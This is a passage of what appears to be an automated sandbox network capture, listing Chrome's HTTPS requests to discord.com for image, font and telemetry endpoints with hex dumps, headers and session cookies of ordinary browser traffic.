                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://discord.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:26 UTC1248INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 77 65 62 70 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 37 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 65 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 30 39 20 44 65 63 20 32 30 32 34 20 31 36 3a 34 35 3a 32 35 20 47 4d 54 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 31 36 20 4d 61 72 20 32 30 32 32 20 30 33 3a 34 38 3a 34 38 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d 0a 61 63 63 65 73 73 2d 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:25 GMTContent-Type: image/webpContent-Length: 870Connection: closeexpires: Mon, 09 Dec 2024 16:45:25 GMTlast-modified: Wed, 16 Mar 2022 03:48:48 GMTcache-control: public, max-age=31536000access-c
                                                                          2023-12-10 16:45:26 UTC121INData Raw: 52 49 46 46 5e 03 00 00 57 45 42 50 56 50 38 20 52 03 00 00 d0 10 00 9d 01 2a 40 00 40 00 3e 6d 2e 92 47 24 22 a1 a1 2e 14 9a a8 80 0d 89 67 00 c8 db b2 a2 de 99 0b 6e 01 c0 2b b7 1a be 8d f9 f7 d4 27 a4 af a0 02 96 88 fe 9d 8f 46 fa 0f 6c 46 8a a6 cc ad b6 e2 e8 cd eb e7 fd 57 7d ac 3d 35 c3 ca 36 59 e7 e1 c2 04 c2 2a 5c 86 a2 e4 6f f1 46 9f b2 92 be a6 0d 4e
                                                                          Data Ascii: RIFF^WEBPVP8 R*@@>m.G$".gn+'FlFW}=56Y*\oFN
                                                                          2023-12-10 16:45:26 UTC749INData Raw: 89 b0 ff 7f 00 4b 35 59 c8 2e 72 fb 28 fb 8c 75 ba 6c c5 46 0e 5d 84 b4 62 df c6 a4 36 34 ee 7b de fa d8 ce 6f e6 f1 50 21 80 00 9e 0c 0e 86 5c fb 30 9a e6 c4 0b c5 8f 5b 04 0c c0 b2 06 19 53 81 85 fc c9 2a 57 58 26 4e 1d f3 48 a7 7f 6c a0 4e 79 87 1f 18 4d 24 ba 40 b8 37 08 63 eb e4 6f 56 4c 12 13 94 18 2d 78 27 d8 5b ea 1b 7b a8 0e 54 82 2b da 70 f4 77 cd ff 1f 65 45 ef aa 3a 89 ec 46 5e 0e 7b 55 c1 63 ef 1b 7a ee 95 84 cc 93 19 75 b0 14 66 69 71 02 0b 70 f7 4a f3 13 90 89 f0 3c 29 6e 3e c7 26 cc a8 80 42 34 16 dc 20 b9 c5 a3 14 83 5a 37 94 a6 58 76 71 06 43 46 a9 35 d2 89 29 93 46 08 d4 61 95 63 01 d8 8c 82 80 df e8 b8 a7 c8 3b d9 02 f7 cc 3f 7e ea 3e ae 93 81 8e 1b b0 27 67 0b 27 96 b1 5f e4 d3 6e a8 c2 6f 08 e3 8c d8 98 7c 3d b5 d2 52 56 57 80 c3 16
                                                                          Data Ascii: K5Y.r(ulF]b64{oP!\0[S*WX&NHlNyM$@7coVL-x'[{T+pweE:F^{UczufiqpJ<)n>&B4 Z7XvqCF5)Fac;?~>'g'_no|=RVW


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          383192.168.2.550121162.159.138.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:25 UTC783OUTGET /assets/3205da2e8f78633583d0.svg HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=GSJjpmAXxKT83YB.7it6A3TWLo4rdfvbJida.TIzSS0-1702226725396-0-604800000
                                                                          2023-12-10 16:45:26 UTC962INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 38 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 64 61 39 38 33 64 39 66 39 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:26 GMTContent-Type: image/svg+xmlContent-Length: 688Connection: closeCF-Ray: 8336f54da983d9f9-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-Co
                                                                          2023-12-10 16:45:26 UTC407INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 20 31 32 22 20 77 69 64 74 68 3d 22 31 33 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 35 2e 33 39 30 31 31 2e 35 34 30 30 32 37 63 2e 33 35 35 33 36 2d 2e 37 32 30 30 33 37 20 31 2e 33 38 32 31 31 2d 2e 37 32 30 30 33 36 20 31 2e 37 33 37 34 37 2e 30 30 30 30 30 32 6c 31 2e 31 38 33 35 39 20 32 2e 33 39 38 32 30 31 63 2e 31 34 31 31 31 2e 32 38 35 39 33 2e 34 31 33 38 38 2e 34 38 34 31 31 2e 37 32 39 34 32 2e 35 32 39 39 36 6c 32 2e 36 34 36 36 31 2e 33 38 34 35 37 63 2e 37 39 34 36 2e 31 31 35 34 36 20 31 2e 31 31 31 39 20 31 2e
                                                                          Data Ascii: <svg fill="none" height="12" viewBox="0 0 13 12" width="13" xmlns="http://www.w3.org/2000/svg"><path d="m5.39011.540027c.35536-.720037 1.38211-.720036 1.73747.000002l1.18359 2.398201c.14111.28593.41388.48411.72942.52996l2.64661.38457c.7946.11546 1.1119 1.
                                                                          2023-12-10 16:45:26 UTC281INData Raw: 34 38 34 2d 2e 36 31 39 34 2d 2e 31 34 38 34 2d 2e 39 30 31 36 32 20 30 6c 2d 32 2e 33 36 37 31 37 20 31 2e 32 34 34 35 63 2d 2e 37 31 30 37 32 2e 33 37 33 36 2d 31 2e 35 34 31 33 38 2d 2e 32 32 39 39 2d 31 2e 34 30 35 36 35 2d 31 2e 30 32 31 33 6c 2e 34 35 32 30 39 2d 32 2e 36 33 35 38 37 63 2e 30 35 33 39 2d 2e 33 31 34 32 37 2d 2e 30 35 30 32 39 2d 2e 36 33 34 39 33 2d 2e 32 37 38 36 31 2d 2e 38 35 37 35 6c 2d 31 2e 39 31 35 30 38 33 2d 31 2e 38 36 36 37 34 63 2d 2e 35 37 34 39 38 34 2d 2e 35 36 30 34 37 2d 2e 32 35 37 36 39 39 38 2d 31 2e 35 33 36 39 37 2e 35 33 36 39 30 38 2d 31 2e 36 35 32 34 33 6c 32 2e 36 34 36 35 37 35 2d 2e 33 38 34 35 37 63 2e 33 31 35 35 34 2d 2e 30 34 35 38 35 2e 35 38 38 33 31 2d 2e 32 34 34 30 33 2e 37 32 39 34 33 2d 2e 35
                                                                          Data Ascii: 484-.6194-.1484-.90162 0l-2.36717 1.2445c-.71072.3736-1.54138-.2299-1.40565-1.0213l.45209-2.63587c.0539-.31427-.05029-.63493-.27861-.8575l-1.915083-1.86674c-.574984-.56047-.2576998-1.53697.536908-1.65243l2.646575-.38457c.31554-.04585.58831-.24403.72943-.5


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          384192.168.2.550122162.159.138.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:25 UTC783OUTGET /assets/8f581f91e7e650ac87a2.svg HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=GSJjpmAXxKT83YB.7it6A3TWLo4rdfvbJida.TIzSS0-1702226725396-0-604800000
                                                                          2023-12-10 16:45:26 UTC958INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 64 62 39 63 32 32 32 35 64 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:26 GMTContent-Type: image/svg+xmlContent-Length: 137Connection: closeCF-Ray: 8336f54db9c2225d-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-Co
                                                                          2023-12-10 16:45:26 UTC137INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 39 20 38 22 20 77 69 64 74 68 3d 22 39 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 34 2e 35 20 30 20 34 2e 35 20 38 68 2d 39 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e
                                                                          Data Ascii: <svg fill="none" height="8" viewBox="0 0 9 8" width="9" xmlns="http://www.w3.org/2000/svg"><path d="m4.5 0 4.5 8h-9z" fill="#fff"/></svg>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          385192.168.2.550123162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:25 UTC1790OUTPOST /api/v9/science HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 1315
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjI1Mjk2NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=
                                                                          X-Fingerprint: 1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3Was
                                                                          X-Debug-Options: bugReporterEnabled
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          X-Discord-Timezone: Europe/Zurich
                                                                          Content-Type: application/json
                                                                          X-Discord-Locale: en-US
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://discord.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=ij7eloHBmCCeZLlHPQdXNtoyRkz0GgukDoWu3bdor6Q-1702226725493-0-604800000
                                                                          2023-12-10 16:45:25 UTC1315OUTData Raw: 7b 22 65 76 65 6e 74 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 5f 61 63 74 69 6f 6e 5f 69 6e 76 69 74 65 5f 72 65 73 6f 6c 76 65 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 63 6c 69 65 6e 74 5f 74 72 61 63 6b 5f 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 30 32 32 32 36 37 32 34 32 32 36 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 75 72 6c 22 3a 22 2f 69 6e 76 69 74 65 73 2f 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 22 2c 22 72 65 71 75 65 73 74 5f 6d 65 74 68 6f 64 22 3a 22 67 65 74 22 2c 22 72 65 73 6f 6c 76 65 64 22 3a 74 72 75 65 2c 22 67 75 69 6c 64 5f 69 64 22 3a 22 39 33 33 32 35 33 33 32 38 37 39 34 36 38 39 35 34 36 22 2c 22 63 68 61 6e 6e 65 6c 5f 69 64 22 3a 22 39 33 33 32 35 39 31 38 35 30 33 32 39 32 35 32
                                                                          Data Ascii: {"events":[{"type":"network_action_invite_resolve","properties":{"client_track_timestamp":1702226724226,"status_code":200,"url":"/invites/boringsecurity","request_method":"get","resolved":true,"guild_id":"933253328794689546","channel_id":"9332591850329252
                                                                          2023-12-10 16:45:26 UTC984INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 76 61 72 79 3a 20 4f 72 69 67 69 6e 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 48 65 61 64 65 72 73 0d 0a 56 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a
                                                                          Data Ascii: HTTP/1.1 204 No ContentDate: Sun, 10 Dec 2023 16:45:26 GMTConnection: closeaccess-control-allow-origin: https://discord.comvary: Origin, Access-Control-Request-Method, Access-Control-Request-HeadersVia: 1.1 googleAlt-Svc: h3=":443"; ma=86400


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          386192.168.2.550124162.159.138.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:25 UTC783OUTGET /assets/44d5e1639bc492dc8d62.svg HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=pqq30mwFe9GP6e.YgyxFZDUBHWxc0QwVNM5t4WjwElo-1702226725605-0-604800000
                                                                          2023-12-10 16:45:26 UTC959INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 34 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 65 39 62 30 64 33 33 35 33 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:26 GMTContent-Type: image/svg+xmlContent-Length: 3146Connection: closeCF-Ray: 8336f54e9b0d3353-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-C
                                                                          2023-12-10 16:45:26 UTC410INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 39 30 20 35 39 2e 31 39 22 3e 0a 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2e 63 6c 73 2d 31 7b 66 69 6c 6c 3a 23 36 61 39 34 66 66 7d 2e 63 6c 73 2d 32 7b 66 69 6c 6c 3a 23 61 39 63 37 66 66 7d 2e 63 6c 73 2d 33 7b 66 69 6c 6c 3a 23 32 30 32 32 32 35 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 2f 64 65 66 73 3e 0a 20 20 3c 67 20 69 64 3d 22 e5 9b be e5 b1 82 5f 32 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 e5 9b be e5 b1 82 20 32 22 3e 0a 20 20 20 20 3c 67 20 69 64 3d 22 4c 61 79 65 72 5f 31 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 4c 61 79 65 72 20 31 22
                                                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 90 59.19"> <defs> <style> .cls-1{fill:#6a94ff}.cls-2{fill:#a9c7ff}.cls-3{fill:#202225} </style> </defs> <g id="_2" data-name=" 2"> <g id="Layer_1" data-name="Layer 1"
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: 32 61 38 2e 35 35 20 38 2e 35 35 20 30 20 30 20 31 2d 35 2e 35 31 2d 32 2e 31 33 63 2d 2e 31 32 2d 2e 31 31 2d 2e 32 34 2d 2e 32 32 2d 2e 33 34 2d 2e 33 33 6c 2d 31 32 2e 36 36 20 35 2e 31 33 61 31 32 2e 34 32 20 31 32 2e 34 32 20 30 20 30 20 30 2d 36 2e 39 20 31 36 6c 2d 35 20 32 41 35 2e 35 32 20 35 2e 35 32 20 30 20 30 20 30 20 2e 34 20 34 32 2e 36 31 6c 34 2e 36 37 20 31 31 2e 35 31 61 35 2e 35 31 20 35 2e 35 31 20 30 20 30 20 30 20 37 2e 31 38 20 33 6c 35 2e 36 34 2d 32 2e 32 38 41 31 32 2e 34 33 20 31 32 2e 34 33 20 30 20 30 20 30 20 33 32 20 35 38 2e 32 38 6c 34 30 2e 35 34 2d 31 36 2e 34 34 61 31 32 2e 34 33 20 31 32 2e 34 33 20 30 20 30 20 30 20 37 2e 37 33 2d 31 32 2e 32 32 6c 36 2e 32 38 2d 32 2e 35 34 61 35 2e 35 32 20 35 2e 35 32 20 30 20 30
                                                                          Data Ascii: 2a8.55 8.55 0 0 1-5.51-2.13c-.12-.11-.24-.22-.34-.33l-12.66 5.13a12.42 12.42 0 0 0-6.9 16l-5 2A5.52 5.52 0 0 0 .4 42.61l4.67 11.51a5.51 5.51 0 0 0 7.18 3l5.64-2.28A12.43 12.43 0 0 0 32 58.28l40.54-16.44a12.43 12.43 0 0 0 7.73-12.22l6.28-2.54a5.52 5.52 0 0
                                                                          2023-12-10 16:45:26 UTC1367INData Raw: 35 20 38 2e 35 35 20 30 20 30 20 31 2d 35 2e 35 31 2d 32 2e 31 33 63 2d 2e 31 32 2d 2e 31 31 2d 2e 32 34 2d 2e 32 32 2d 2e 33 34 2d 2e 33 33 5a 4d 35 35 2e 36 39 20 33 38 2e 30 35 6c 2d 31 31 2e 37 37 20 34 2e 37 37 41 31 30 2e 36 31 20 31 30 2e 36 31 20 30 20 30 20 31 20 33 30 2e 31 31 20 33 37 6c 2d 33 2e 33 33 2d 38 2e 32 33 41 34 20 34 20 30 20 30 20 31 20 32 39 20 32 33 2e 35 36 6c 32 33 2e 33 31 2d 39 2e 34 34 61 34 20 34 20 30 20 30 20 31 20 35 2e 31 38 20 32 2e 31 39 6c 33 2e 36 33 20 39 61 39 2e 38 20 39 2e 38 20 30 20 30 20 31 2d 35 2e 34 33 20 31 32 2e 37 34 5a 4d 36 37 2e 34 39 20 32 31 61 33 2e 37 33 20 33 2e 37 33 20 30 20 31 20 31 20 32 2e 30 35 2d 34 2e 38 35 41 33 2e 37 32 20 33 2e 37 32 20 30 20 30 20 31 20 36 37 2e 34 39 20 32 31 5a 22
                                                                          Data Ascii: 5 8.55 0 0 1-5.51-2.13c-.12-.11-.24-.22-.34-.33ZM55.69 38.05l-11.77 4.77A10.61 10.61 0 0 1 30.11 37l-3.33-8.23A4 4 0 0 1 29 23.56l23.31-9.44a4 4 0 0 1 5.18 2.19l3.63 9a9.8 9.8 0 0 1-5.43 12.74ZM67.49 21a3.73 3.73 0 1 1 2.05-4.85A3.72 3.72 0 0 1 67.49 21Z"


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          387192.168.2.550125162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:26 UTC1016OUTGET /assets/b9811218b3a54ad59fb2.woff2 HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://discord.com
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: font
                                                                          Referer: https://discord.com/assets/app.83f01b3df65cd0fa3bb9.css
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=zTyHcYXle.ulldoKhDyuZdpCFGGhUOczyQR6YErOS08-1702226725668-0-604800000
